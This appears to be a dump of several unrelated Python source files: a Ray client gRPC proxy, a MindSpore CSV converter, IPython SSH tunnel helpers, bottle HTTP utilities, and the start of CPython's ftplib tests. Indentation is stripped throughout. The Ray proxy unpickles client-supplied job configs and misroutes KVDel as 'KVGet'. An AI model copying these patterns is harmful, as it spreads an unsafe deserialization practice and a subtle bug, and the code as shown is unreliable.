def _get_server_for_client(self, client_id: str) -> Optional[SpecificServer]:
with self.server_lock:
client = self.servers.get(client_id)
if client is None:
logger.error(f"Unable to find channel for client: {client_id}")
return client
def has_channel(self, client_id: str) -> bool:
server = self._get_server_for_client(client_id)
if server is None:
return False
return server.is_ready()
def get_channel(
self,
client_id: str,
) -> Optional["grpc._channel.Channel"]:
"""
Find the gRPC Channel for the given client_id. This will block until
the server process has started.
"""
server = self._get_server_for_client(client_id)
if server is None:
return None
# Wait for the SpecificServer to become ready.
server.wait_ready()
try:
grpc.channel_ready_future(server.channel).result(
timeout=CHECK_CHANNEL_TIMEOUT_S
)
return server.channel
except grpc.FutureTimeoutError:
logger.exception(f"Timeout waiting for channel for {client_id}")
return None
def _check_processes(self):
"""
Keeps the internal servers dictionary up-to-date with running servers.
"""
while True:
with self.server_lock:
for client_id, specific_server in list(self.servers.items()):
if specific_server.poll() is not None:
logger.info(
f"Specific server {client_id} is no longer running"
f", freeing its port {specific_server.port}"
)
del self.servers[client_id]
# Port is available to use again.
self._free_ports.append(specific_server.port)
time.sleep(CHECK_PROCESS_INTERVAL_S)
def _cleanup(self) -> None:
"""
Forcibly kill all spawned RayClient Servers. This ensures cleanup
for platforms where fate sharing is not supported.
"""
for server in self.servers.values():
server.kill()
class RayletServicerProxy(ray_client_pb2_grpc.RayletDriverServicer):
def __init__(self, ray_connect_handler: Callable, proxy_manager: ProxyManager):
self.proxy_manager = proxy_manager
self.ray_connect_handler = ray_connect_handler
def _call_inner_function(
self, request, context, method: str
) -> Optional[ray_client_pb2_grpc.RayletDriverStub]:
client_id = _get_client_id_from_context(context)
chan = self.proxy_manager.get_channel(client_id)
if not chan:
logger.error(f"Channel for Client: {client_id} not found!")
context.set_code(grpc.StatusCode.NOT_FOUND)
return None
stub = ray_client_pb2_grpc.RayletDriverStub(chan)
try:
metadata = [("client_id", client_id)]
if context:
metadata = context.invocation_metadata()
return getattr(stub, method)(request, metadata=metadata)
except Exception as e:
# Error while proxying -- propagate the error's context to user
logger.exception(f"Proxying call to {method} failed!")
_propagate_error_in_context(e, context)
def _has_channel_for_request(self, context):
client_id = _get_client_id_from_context(context)
return self.proxy_manager.has_channel(client_id)
def Init(self, request, context=None) -> ray_client_pb2.InitResponse:
return self._call_inner_function(request, context, "Init")
def KVPut(self, request, context=None) -> ray_client_pb2.KVPutResponse:
"""Proxies internal_kv.put.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVPut")
with disable_client_hook():
already_exists = ray.experimental.internal_kv._internal_kv_put(
request.key, request.value, overwrite=request.overwrite
)
return ray_client_pb2.KVPutResponse(already_exists=already_exists)
def KVGet(self, request, context=None) -> ray_client_pb2.KVGetResponse:
"""Proxies internal_kv.get.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVGet")
with disable_client_hook():
value = ray.experimental.internal_kv._internal_kv_get(request.key)
return ray_client_pb2.KVGetResponse(value=value)
def KVDel(self, request, context=None) -> ray_client_pb2.KVDelResponse:
"""Proxies internal_kv.delete.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVGet")
with disable_client_hook():
ray.experimental.internal_kv._internal_kv_del(request.key)
return ray_client_pb2.KVDelResponse()
def KVList(self, request, context=None) -> ray_client_pb2.KVListResponse:
"""Proxies internal_kv.list.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVList")
with disable_client_hook():
keys = ray.experimental.internal_kv._internal_kv_list(request.prefix)
return ray_client_pb2.KVListResponse(keys=keys)
def KVExists(self, request, context=None) -> ray_client_pb2.KVExistsResponse:
"""Proxies internal_kv.exists.
This is used by the working_dir code to upload to the GCS before
ray.init is called. In that case (if we don't have a server yet)
we directly make the internal KV call from the proxier.
Otherwise, we proxy the call to the downstream server as usual.
"""
if self._has_channel_for_request(context):
return self._call_inner_function(request, context, "KVExists")
with disable_client_hook():
exists = ray.experimental.internal_kv._internal_kv_exists(request.key)
return ray_client_pb2.KVExistsResponse(exists=exists)
def ListNamedActors(
self, request, context=None
) -> ray_client_pb2.ClientListNamedActorsResponse:
return self._call_inner_function(request, context, "ListNamedActors")
def ClusterInfo(self, request, context=None) -> ray_client_pb2.ClusterInfoResponse:
# NOTE: We need to respond to the PING request here to allow the client
# to continue with connecting.
if request.type == ray_client_pb2.ClusterInfoType.PING:
resp = ray_client_pb2.ClusterInfoResponse(json=json.dumps({}))
return resp
return self._call_inner_function(request, context, "ClusterInfo")
def Terminate(self, req, context=None):
return self._call_inner_function(req, context, "Terminate")
def GetObject(self, request, context=None):
return self._call_inner_function(request, context, "GetObject")
def PutObject(
self, request: ray_client_pb2.PutRequest, context=None
) -> ray_client_pb2.PutResponse:
return self._call_inner_function(request, context, "PutObject")
def WaitObject(self, request, context=None) -> ray_client_pb2.WaitResponse:
return self._call_inner_function(request, context, "WaitObject")
def Schedule(self, task, context=None) -> ray_client_pb2.ClientTaskTicket:
return self._call_inner_function(task, context, "Schedule")
def ray_client_server_env_prep(job_config: JobConfig) -> JobConfig:
return job_config
def prepare_runtime_init_req(
init_request: ray_client_pb2.DataRequest,
) -> Tuple[ray_client_pb2.DataRequest, JobConfig]:
"""
Extract JobConfig and possibly mutate InitRequest before it is passed to
the specific RayClient Server.
"""
init_type = init_request.WhichOneof("type")
assert init_type == "init", (
"Received initial message of type " f"{init_type}, not 'init'."
)
req = init_request.init
job_config = JobConfig()
if req.job_config:
job_config = pickle.loads(req.job_config)
new_job_config = ray_client_server_env_prep(job_config)
modified_init_req = ray_client_pb2.InitRequest(
job_config=pickle.dumps(new_job_config),
ray_init_kwargs=init_request.init.ray_init_kwargs,
reconnect_grace_period=init_request.init.reconnect_grace_period,
)
init_request.init.CopyFrom(modified_init_req)
return (init_request, new_job_config)
class DataServicerProxy(ray_client_pb2_grpc.RayletDataStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
self.num_clients = 0
# dictionary mapping client_id's to the last time they connected
self.clients_last_seen: Dict[str, float] = {}
self.reconnect_grace_periods: Dict[str, float] = {}
self.clients_lock = Lock()
self.proxy_manager = proxy_manager
self.stopped = Event()
def modify_connection_info_resp(
self, init_resp: ray_client_pb2.DataResponse
) -> ray_client_pb2.DataResponse:
"""
Modify the `num_clients` returned the ConnectionInfoResponse because
individual SpecificServers only have **one** client.
"""
init_type = init_resp.WhichOneof("type")
if init_type != "connection_info":
return init_resp
modified_resp = ray_client_pb2.DataResponse()
modified_resp.CopyFrom(init_resp)
with self.clients_lock:
modified_resp.connection_info.num_clients = self.num_clients
return modified_resp
def Datapath(self, request_iterator, context):
cleanup_requested = False
start_time = time.time()
client_id = _get_client_id_from_context(context)
if client_id == "":
return
reconnecting = _get_reconnecting_from_context(context)
if reconnecting:
with self.clients_lock:
if client_id not in self.clients_last_seen:
# Client took too long to reconnect, session has already
# been cleaned up
context.set_code(grpc.StatusCode.NOT_FOUND)
context.set_details(
"Attempted to reconnect a session that has already "
"been cleaned up"
)
return
self.clients_last_seen[client_id] = start_time
server = self.proxy_manager._get_server_for_client(client_id)
channel = self.proxy_manager.get_channel(client_id)
# iterator doesn't need modification on reconnect
new_iter = request_iterator
else:
# Create Placeholder *before* reading the first request.
server = self.proxy_manager.create_specific_server(client_id)
with self.clients_lock:
self.clients_last_seen[client_id] = start_time
self.num_clients += 1
try:
if not reconnecting:
logger.info(f"New data connection from client {client_id}: ")
init_req = next(request_iterator)
with self.clients_lock:
self.reconnect_grace_periods[
client_id
] = init_req.init.reconnect_grace_period
try:
modified_init_req, job_config = prepare_runtime_init_req(init_req)
if not self.proxy_manager.start_specific_server(
client_id, job_config
):
logger.error(
f"Server startup failed for client: {client_id}, "
f"using JobConfig: {job_config}!"
)
raise RuntimeError(
"Starting Ray client server failed. See "
f"ray_client_server_{server.port}.err for "
"detailed logs."
)
channel = self.proxy_manager.get_channel(client_id)
if channel is None:
logger.error(f"Channel not found for {client_id}")
raise RuntimeError(
"Proxy failed to Connect to backend! Check "
"`ray_client_server.err` and "
f"`ray_client_server_{server.port}.err` on the "
"head node of the cluster for the relevant logs. "
"By default these are located at "
"/tmp/ray/session_latest/logs."
)
except Exception:
init_resp = ray_client_pb2.DataResponse(
init=ray_client_pb2.InitResponse(
ok=False, msg=traceback.format_exc()
)
)
init_resp.req_id = init_req.req_id
yield init_resp
return None
new_iter = chain([modified_init_req], request_iterator)
stub = ray_client_pb2_grpc.RayletDataStreamerStub(channel)
metadata = [("client_id", client_id), ("reconnecting", str(reconnecting))]
resp_stream = stub.Datapath(new_iter, metadata=metadata)
for resp in resp_stream:
resp_type = resp.WhichOneof("type")
if resp_type == "connection_cleanup":
# Specific server is skipping cleanup, proxier should too
cleanup_requested = True
yield self.modify_connection_info_resp(resp)
except Exception as e:
logger.exception("Proxying Datapath failed!")
# Propogate error through context
recoverable = _propagate_error_in_context(e, context)
if not recoverable:
# Client shouldn't attempt to recover, clean up connection
cleanup_requested = True
finally:
cleanup_delay = self.reconnect_grace_periods.get(client_id)
if not cleanup_requested and cleanup_delay is not None:
# Delay cleanup, since client may attempt a reconnect
# Wait on stopped event in case the server closes and we
# can clean up earlier
self.stopped.wait(timeout=cleanup_delay)
with self.clients_lock:
if client_id not in self.clients_last_seen:
logger.info(f"{client_id} not found. Skipping clean up.")
# Connection has already been cleaned up
return
last_seen = self.clients_last_seen[client_id]
logger.info(
f"{client_id} last started stream at {last_seen}. Current "
f"stream started at {start_time}."
)
if last_seen > start_time:
logger.info("Client reconnected. Skipping cleanup.")
# Client has reconnected, don't clean up
return
logger.debug(f"Client detached: {client_id}")
self.num_clients -= 1
del self.clients_last_seen[client_id]
if client_id in self.reconnect_grace_periods:
del self.reconnect_grace_periods[client_id]
server.set_result(None)
class LogstreamServicerProxy(ray_client_pb2_grpc.RayletLogStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
super().__init__()
self.proxy_manager = proxy_manager
def Logstream(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
logger.debug(f"New logstream connection from client {client_id}: ")
channel = None
# We need to retry a few times because the LogClient *may* connect
# Before the DataClient has finished connecting.
for i in range(LOGSTREAM_RETRIES):
channel = self.proxy_manager.get_channel(client_id)
if channel is not None:
break
logger.warning(f"Retrying Logstream connection. {i+1} attempts failed.")
time.sleep(LOGSTREAM_RETRY_INTERVAL_SEC)
if channel is None:
context.set_code(grpc.StatusCode.NOT_FOUND)
context.set_details(
"Logstream proxy failed to connect. Channel for client "
f"{client_id} not found."
)
return None
stub = ray_client_pb2_grpc.RayletLogStreamerStub(channel)
resp_stream = stub.Logstream(
request_iterator, metadata=[("client_id", client_id)]
)
try:
for resp in resp_stream:
yield resp
except Exception:
logger.exception("Proxying Logstream failed!")
def serve_proxier(
connection_str: str,
address: Optional[str],
*,
redis_password: Optional[str] = None,
session_dir: Optional[str] = None,
runtime_env_agent_port: int = 0,
):
# Initialize internal KV to be used to upload and download working_dir
# before calling ray.init within the RayletServicers.
# NOTE(edoakes): redis_address and redis_password should only be None in
# tests.
if use_gcs_for_bootstrap():
if address is not None:
gcs_cli = GcsClient(address=address)
ray.experimental.internal_kv._initialize_internal_kv(gcs_cli)
else:
if address is not None and redis_password is not None:
gcs_cli = GcsClient.connect_to_gcs_by_redis_address(address, redis_password)
ray.experimental.internal_kv._initialize_internal_kv(gcs_cli)
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=CLIENT_SERVER_MAX_THREADS),
options=GRPC_OPTIONS,
)
proxy_manager = ProxyManager(
address,
session_dir=session_dir,
redis_password=redis_password,
runtime_env_agent_port=runtime_env_agent_port,
)
task_servicer = RayletServicerProxy(None, proxy_manager)
data_servicer = DataServicerProxy(proxy_manager)
logs_servicer = LogstreamServicerProxy(proxy_manager)
ray_client_pb2_grpc.add_RayletDriverServicer_to_server(task_servicer, server)
ray_client_pb2_grpc.add_RayletDataStreamerServicer_to_server(data_servicer, server)
ray_client_pb2_grpc.add_RayletLogStreamerServicer_to_server(logs_servicer, server)
add_port_to_grpc_server(server, connection_str)
server.start()
return ClientServerHandle(
task_servicer=task_servicer,
data_servicer=data_servicer,
logs_servicer=logs_servicer,
grpc_server=server,
)
|
csv_to_mr.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Csv format convert tool for MindRecord.
"""
from importlib import import_module
import os
from mindspore import log as logger
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread
try:
pd = import_module("pandas")
except ModuleNotFoundError:
pd = None
__all__ = ['CsvToMR']
class CsvToMR:
"""
A class to transform from csv to MindRecord.
Args:
source (str): the file path of csv.
destination (str): the MindRecord file path to transform into.
columns_list(list[str], optional): A list of columns to be read(default=None).
partition_number (int, optional): partition size (default=1).
Raises:
ValueError: If `source`, `destination`, `partition_number` is invalid.
RuntimeError: If `columns_list` is invalid.
"""
def __init__(self, source, destination, columns_list=None, partition_number=1):
if not pd:
raise Exception("Module pandas is not found, please use pip install it.")
if isinstance(source, str):
check_filename(source)
self.source = source
else:
raise ValueError("The parameter source must be str.")
self.check_columns(columns_list, "columns_list")
self.columns_list = columns_list
if isinstance(destination, str):
check_filename(destination)
self.destination = destination
else:
raise ValueError("The parameter destination must be str.")
if partition_number is not None:
if not isinstance(partition_number, int):
raise ValueError("The parameter partition_number must be int")
self.partition_number = partition_number
else:
raise ValueError("The parameter partition_number must be int")
self.writer = FileWriter(self.destination, self.partition_number)
@staticmethod
def check_columns(columns, columns_name):
if not columns:
return
if isinstance(columns, list):
for col in columns:
if not isinstance(col, str):
raise ValueError("The parameter {} must be list of str.".format(columns_name))
else:
raise ValueError("The parameter {} must be list of str.".format(columns_name))
def _get_schema(self, df):
"""
Construct schema from df columns
"""
if self.columns_list:
for col in self.columns_list:
if col not in df.columns:
raise RuntimeError("The parameter columns_list is illegal, column {} does not exist.".format(col))
else:
self.columns_list = df.columns
schema = {}
for col in self.columns_list:
if str(df[col].dtype) == 'int64':
schema[col] = {"type": "int64"}
elif str(df[col].dtype) == 'float64':
schema[col] = {"type": "float64"}
elif str(df[col].dtype) == 'bool':
schema[col] = {"type": "int32"}
else:
schema[col] = {"type": "string"}
if not schema:
raise RuntimeError("Failed to generate schema from csv file.")
return schema
@staticmethod
def get_row_of_csv(df, columns_list):
"""Get row data from csv file."""
for _, r in df.iterrows():
row = {}
for col in columns_list:
if str(df[col].dtype) == 'bool':
row[col] = int(r[col])
else:
row[col] = r[col]
yield row
def run(self):
"""
Execute transformation from csv to MindRecord.
Returns:
MSRStatus, whether csv is successfully transformed to MindRecord.
"""
if not os.path.exists(self.source):
raise IOError("Csv file {} do not exist.".format(self.source))
pd.set_option('display.max_columns', None)
df = pd.read_csv(self.source)
csv_schema = self._get_schema(df)
logger.info("transformed MindRecord schema is: {}".format(csv_schema))
# set the header size
self.writer.set_header_size(1 << 24)
# set the page size
self.writer.set_page_size(1 << 26)
# create the schema
self.writer.add_schema(csv_schema, "csv_schema")
# add the index
self.writer.add_index(list(self.columns_list))
csv_iter = self.get_row_of_csv(df, self.columns_list)
batch_size = 256
transform_count = 0
while True:
data_list = []
try:
for _ in range(batch_size):
data_list.append(csv_iter.__next__())
transform_count += 1
self.writer.write_raw_data(data_list)
logger.info("transformed {} record...".format(transform_count))
except StopIteration:
if data_list:
self.writer.write_raw_data(data_list)
logger.info(
"transformed {} record...".format(transform_count))
break
ret = self.writer.commit()
return ret
def transform(self):
"""
Encapsulate the run function to exit normally
"""
t = ExceptionThread(target=self.run)
t.daemon = True
t.start()
t.join()
if t.exitcode != 0:
raise t.exception
return t.res
|
tunnel.py
|
"""Basic ssh tunnel utilities, and convenience functions for tunneling
zeromq connections.
Authors
-------
* Min RK
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from __future__ import print_function
import os,sys, atexit
import socket
from multiprocessing import Process
from getpass import getpass, getuser
import warnings
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import paramiko
except ImportError:
paramiko = None
else:
from forward import forward_tunnel
try:
from IPython.external import pexpect
except ImportError:
pexpect = None
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
# select_random_ports copied from IPython.parallel.util
_random_ports = set()
def select_random_ports(n):
"""Selects and return n random ports that are available."""
ports = []
for i in xrange(n):
sock = socket.socket()
sock.bind(('', 0))
while sock.getsockname()[1] in _random_ports:
sock.close()
sock = socket.socket()
sock.bind(('', 0))
ports.append(sock)
for i, sock in enumerate(ports):
port = sock.getsockname()[1]
sock.close()
ports[i] = port
_random_ports.add(port)
return ports
#-----------------------------------------------------------------------------
# Check for passwordless login
#-----------------------------------------------------------------------------
def try_passwordless_ssh(server, keyfile, paramiko=None):
"""Attempt to make an ssh connection without a password.
This is mainly used for requiring password input only once
when many tunnels may be connected to the same server.
If paramiko is None, the default for the platform is chosen.
"""
if paramiko is None:
paramiko = sys.platform == 'win32'
if not paramiko:
f = _try_passwordless_openssh
else:
f = _try_passwordless_paramiko
return f(server, keyfile)
def _try_passwordless_openssh(server, keyfile):
"""Try passwordless login with shell ssh command."""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko")
cmd = 'ssh -f '+ server
if keyfile:
cmd += ' -i ' + keyfile
cmd += ' exit'
p = pexpect.spawn(cmd)
while True:
try:
p.expect('[Ppassword]:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
return True
else:
return False
def _try_passwordless_paramiko(server, keyfile):
"""Try passwordless login with paramiko."""
if paramiko is None:
msg = "Paramiko unavaliable, "
if sys.platform == 'win32':
msg += "Paramiko is required for ssh tunneled connections on Windows."
else:
msg += "use OpenSSH."
raise ImportError(msg)
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True)
except paramiko.AuthenticationException:
return False
else:
client.close()
return True
def tunnel_connection(socket, addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Connect a socket to an address via an ssh tunnel.
This is a wrapper for socket.connect(addr), when addr is not accessible
from the local machine. It simply creates an ssh tunnel using the remaining args,
and calls socket.connect('tcp://localhost:lport') where lport is the randomly
selected local port of the tunnel.
"""
new_url, tunnel = open_tunnel(addr, server, keyfile=keyfile, password=password, paramiko=paramiko, timeout=timeout)
socket.connect(new_url)
return tunnel
def open_tunnel(addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Open a tunneled connection from a 0MQ url.
For use inside tunnel_connection.
Returns
-------
(url, tunnel): The 0MQ url that has been forwarded, and the tunnel object
"""
lport = select_random_ports(1)[0]
transport, addr = addr.split('://')
ip,rport = addr.split(':')
rport = int(rport)
if paramiko is None:
paramiko = sys.platform == 'win32'
if paramiko:
tunnelf = paramiko_tunnel
else:
tunnelf = openssh_tunnel
tunnel = tunnelf(lport, rport, server, remoteip=ip, keyfile=keyfile, password=password, timeout=timeout)
return 'tcp://127.0.0.1:%i'%lport, tunnel
def openssh_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""Create an ssh tunnel using command-line ssh that connects port lport
on this machine to localhost:rport on server. The tunnel
will automatically close when not in use, remaining open
for a minimum of timeout seconds for an initial connection.
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko_tunnel")
ssh="ssh "
if keyfile:
ssh += "-i " + keyfile
if ':' in server:
server, port = server.split(':')
ssh += " -p %s" % port
cmd = "%s -f -L 127.0.0.1:%i:%s:%i %s sleep %i" % (
ssh, lport, remoteip, rport, server, timeout)
tunnel = pexpect.spawn(cmd)
failed = False
while True:
try:
tunnel.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
if tunnel.exitstatus:
print (tunnel.exitstatus)
print (tunnel.before)
print (tunnel.after)
raise RuntimeError("tunnel '%s' failed to start"%(cmd))
else:
return tunnel.pid
else:
if failed:
print("Password rejected, try again")
password=None
if password is None:
password = getpass("%s's password: "%(server))
tunnel.sendline(password)
failed = True
def _split_server(server):
if '@' in server:
username,server = server.split('@', 1)
else:
username = getuser()
if ':' in server:
server, port = server.split(':')
port = int(port)
else:
port = 22
return username, server, port
def paramiko_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""launch a tunner with paramiko in a subprocess. This should only be used
when shell ssh is unavailable (e.g. Windows).
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
If you are familiar with ssh tunnels, this creates the tunnel:
ssh server -L localhost:lport:remoteip:rport
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if paramiko is None:
raise ImportError("Paramiko not available")
if password is None:
if not _try_passwordless_paramiko(server, keyfile):
password = getpass("%s's password: "%(server))
p = Process(target=_paramiko_tunnel,
args=(lport, rport, server, remoteip),
kwargs=dict(keyfile=keyfile, password=password))
p.daemon=False
p.start()
atexit.register(_shutdown_process, p)
return p
def _shutdown_process(p):
if p.is_alive():
p.terminate()
def _paramiko_tunnel(lport, rport, server, remoteip, keyfile=None, password=None):
"""Function for actually starting a paramiko tunnel, to be passed
to multiprocessing.Process(target=this), and not called directly.
"""
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True, password=password)
# except paramiko.AuthenticationException:
# if password is None:
# password = getpass("%s@%s's password: "%(username, server))
# client.connect(server, port, username=username, password=password)
# else:
# raise
except Exception as e:
print ('*** Failed to connect to %s:%d: %r' % (server, port, e))
sys.exit(1)
# print ('Now forwarding port %d to %s:%d ...' % (lport, server, rport))
try:
forward_tunnel(lport, remoteip, rport, client.get_transport())
except KeyboardInterrupt:
print ('SIGINT: Port forwarding stopped cleanly')
sys.exit(0)
except Exception as e:
print ("Port forwarding stopped uncleanly: %s"%e)
sys.exit(255)
if sys.platform == 'win32':
ssh_tunnel = paramiko_tunnel
else:
ssh_tunnel = openssh_tunnel
__all__ = ['tunnel_connection', 'ssh_tunnel', 'openssh_tunnel', 'paramiko_tunnel', 'try_passwordless_ssh']
|
http_utils.py
|
# coding: utf-8
from __future__ import unicode_literals
from bottle import HTTPError, ServerAdapter
from functools import partial, wraps
from threading import Thread
RETRY_AFTER_HEADER = str('Retry-After')
def abort(code, message=None, headers=None):
"""
Abort a request and send a response with the given code, and optional message and headers.
:raises:
:class:`HTTPError`
"""
raise HTTPError(code, {'message': message}, headers=headers)
def retry_after(delay, code=429):
"""
Abort a request and send a response, including a Retry-After header informing the client when a retry of
the request will be accepted.
"""
abort(code, headers={RETRY_AFTER_HEADER: delay})
def authorize(method):
"""Decorator for a method that requires authorization. Unauthorized requests will be aborted with a 401."""
@wraps(method)
def authorized_method(self, *args, **kwargs):
skip_auth = kwargs.pop('skip_auth', False)
if not skip_auth:
self.check_authorization_header()
return method(self, *args, **kwargs)
return authorized_method
def rate_limit(method):
"""Decorator for a method that requires rate limiting. Too many requests will be aborted with a 429."""
@wraps(method)
def limited_method(self, *args, **kwargs):
skip_limit = kwargs.pop('skip_limit', False)
if not skip_limit:
self.check_rate_limits()
return method(self, *args, **kwargs)
return limited_method
def _route(verb, app, route):
"""Helper decorator to apply methods to routes."""
def routed_method(method):
setattr(method, 'verb', verb)
setattr(method, 'app', app)
setattr(method, 'route', route)
return method
return routed_method
def log_request(method):
"""Decorator for a method to add its request to the request log."""
@wraps(method)
def logged_method(self, *args, **kwargs):
skip_log = kwargs.pop('skip_log', False)
if not skip_log:
self.append_to_request_log()
return method(self, *args, **kwargs)
return logged_method
GET = partial(_route, 'GET')
POST = partial(_route, 'POST')
PUT = partial(_route, 'PUT')
DELETE = partial(_route, 'DELETE')
OPTIONS = partial(_route, 'OPTIONS')
class StoppableWSGIRefServer(ServerAdapter):
"""
Subclass of built-in Bottle server adapter that allows the server to be stopped.
This is important for testing, since we don't want to "serve forever".
"""
def __init__(self, host='127.0.0.1', port=8080, **options):
super(StoppableWSGIRefServer, self).__init__(host, port, **options)
self.srv = None
self._thread = None
def run(self, app):
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
from wsgiref.simple_server import make_server
class FixedHandler(WSGIRequestHandler):
def address_string(self):
return self.client_address[0]
parent = self
def log_request(self, *args, **kw):
if not self.parent.quiet:
return WSGIRequestHandler.log_request(self, *args, **kw)
handler_cls = self.options.get('handler_class', FixedHandler)
server_cls = self.options.get('server_class', WSGIServer)
self.srv = make_server(self.host, self.port, app, server_cls, handler_cls)
thread = Thread(target=self.srv.serve_forever)
thread.daemon = True
thread.start()
self._thread = thread
self.srv.wait = self.wait
return self.srv
def wait(self):
self.srv.server_close()
self._thread.join()
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import threading
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase, skipUnless
from test import support
from test.support import threading_helper
from test.support import socket_helper
from test.support import warnings_helper
from test.support.socket_helper import HOST, HOSTv6
TIMEOUT = support.LOOPBACK_TIMEOUT
DEFAULT_ENCODING = 'utf-8'
# the dummy data returned by server over the data channel when
# RETR, LIST, NLST, MLSD commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000 + 'non-ascii char \xAE\r\n'
LIST_DATA = 'foo\r\nbar\r\n non-ascii char \xAE\r\n'
NLST_DATA = 'foo\r\nbar\r\n non-ascii char \xAE\r\n'
MLSD_DATA = ("type=cdir;perm=el;unique==keVO1+ZF4; test\r\n"
"type=pdir;perm=e;unique==keVO1+d?3; ..\r\n"
"type=OS.unix=slink:/foobar;perm=;unique==keVO1+4G4; foobar\r\n"
"type=OS.unix=chr-13/29;perm=;unique==keVO1+5G4; device\r\n"
"type=OS.unix=blk-11/108;perm=;unique==keVO1+6G4; block\r\n"
"type=file;perm=awr;unique==keVO1+8G4; writable\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; promiscuous\r\n"
"type=dir;perm=;unique==keVO1+1t2; no-exec\r\n"
"type=file;perm=r;unique==keVO1+EG4; two words\r\n"
"type=file;perm=r;unique==keVO1+IH4; leading space\r\n"
"type=file;perm=r;unique==keVO1+1G4; file1\r\n"
"type=dir;perm=cpmel;unique==keVO1+7G4; incoming\r\n"
"type=file;perm=r;unique==keVO1+1G4; file2\r\n"
"type=file;perm=r;unique==keVO1+1G4; file3\r\n"
"type=file;perm=r;unique==keVO1+1G4; file4\r\n"
"type=dir;perm=cpmel;unique==SGP1; dir \xAE non-ascii char\r\n"
"type=file;perm=r;unique==SGP2; file \xAE non-ascii char\r\n")
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
self.encoding = baseclass.encoding
def handle_read(self):
new_data = self.recv(1024).decode(self.encoding, 'replace')
self.baseclass.last_received_data += new_data
def handle_close(self):
# XXX: this method can be called many times in a row for a single
